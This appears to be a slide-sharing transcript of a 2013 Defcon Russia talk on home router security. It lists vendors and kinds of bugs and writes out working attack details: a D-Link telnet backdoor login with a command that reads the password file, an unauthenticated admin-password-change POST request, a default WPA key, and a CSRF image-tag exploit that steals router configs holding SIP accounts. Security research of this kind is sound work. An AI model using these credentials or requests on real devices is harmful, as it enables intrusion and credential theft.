Upload
marlow
View
54
Download
0
Tags:
Embed Size (px)
DESCRIPTION
Home router security. @090h @ cherboff DCG #7812 10 /0 8 /201 3. .:VENDORS:. VENDORZ = [‘D-Link’, ‘TP-Link’, ‘ASUS’, ‘ ZyXEL ’, ‘ NetGear ’, ‘ Cisco Linksys ’, … ]. .:SERVICES:. SERVICES = [ HTTP, TELNET, SSH, DNS, UPNDP, DHCP, - PowerPoint PPT Presentation
Citation preview
Home router security
@090h
@cherboff
DCG #781210/08/2013
Defcon Russia (DCG #7812) 2
.:VENDORS:.
VENDORZ = [ ‘D-Link’, ‘TP-Link’, ‘ASUS’,‘ZyXEL’, ‘NetGear’,‘Cisco Linksys’,…
]
Defcon Russia (DCG #7812) 3
.:SERVICES:.
SERVICES = [HTTP, TELNET, SSH, DNS,UPNDP, DHCP,TFTP 4 RECOVERY, ]
Defcon Russia (DCG #7812) 4
.:BUGZ:.
ROUTER_VULN_TYPES = [ WPS,COMMAND_INJECTION, PLAIN_TEXT_PASSWORDS,INFO_LEAK,BUFFER_OVERFLOW,AUTH_BYPASS,CSRF, XSS,VENDOR_BACKDORS,]
Defcon Russia (DCG #7812) 5
MEANWHILE IN RUSSIAZyXEL.popular
Defcon Russia (DCG #7812) 6
MEANWHILE IN RUSSIA TP-Link.popular
Defcon Russia (DCG #7812) 7
MEANWHILE IN RUSSIAD-Link.popular
Defcon Russia (DCG #7812) 8
TP-Link.XSSED
Defcon Russia (DCG #7812) 9
DIR-300? REALY??!!
Defcon Russia (DCG #7812) 10
WPAPSK.default = 76543210
Defcon Russia (DCG #7812) 11
D-Link.telnet_backd00r
telnet 192.168.1.1 login: Alphanetworks password: wrgn23_dlwbr_dir300b cat /var/etc/httpasswd
Defcon Russia (DCG #7812) 12
.:REAL_GAME_RULES:.
DEFAULT_AUTH= { ‘admin’: [‘admin’, ‘1234’]}USERS_NEVER_UPDATE = TrueANTIVIRUS_SOFTWATE = NoneONEBUG_EXPLOIT_TARGETS = [
‘D-Link’, ‘NetGear’, ‘Cisco Linksys’]PLATFOTM = {‘ARCH’: ‘MIPS’, ‘OS’: ‘LiNUX’}UID = 0
Defcon Russia (DCG #7812) 13
Dir300.no_auth_password_change
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
Defcon Russia (DCG #7812) 14
ONE_BUG_ARMY
/*
Text
*/
Defcon Russia (DCG #7812) 15
ONE_BUG_ARMY
/*
Text
*/
Defcon Russia (DCG #7812) 16
DIR300.py + SHODAN
Defcon Russia (DCG #7812) 17
Yet one CSRF story
Defcon Russia (DCG #7812) 18
D-Link DPN-5402admin/admin…
19
Wooot?
Defcon Russia (DCG #7812)
Defcon Russia (DCG #7812) 20
YES!CSRF?
Defcon Russia (DCG #7812) 21
Evil Plan.Evil WEB site
CSRF
Evil FTP server
Config
Defcon Russia (DCG #7812) 22
<IMG src=“http://192.168.0.1/goform/cbBackupCfg...
3xplo1T ;-)
23
• Network conf• Usless stuff conf
• PPPOE account• SIP account
Defcon Russia (DCG #7812)
Config
24Defcon Russia (DCG #7812)
Telephony
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
25
• SIP account• Not attached 2 device
• Can be used anywhere• Stealed via stupid CSRF
Defcon Russia (DCG #7812)
Phone number is
26
fin.
Defcon Russia (DCG #7812)
27
$>Questions?
Defcon Russia (DCG #7812)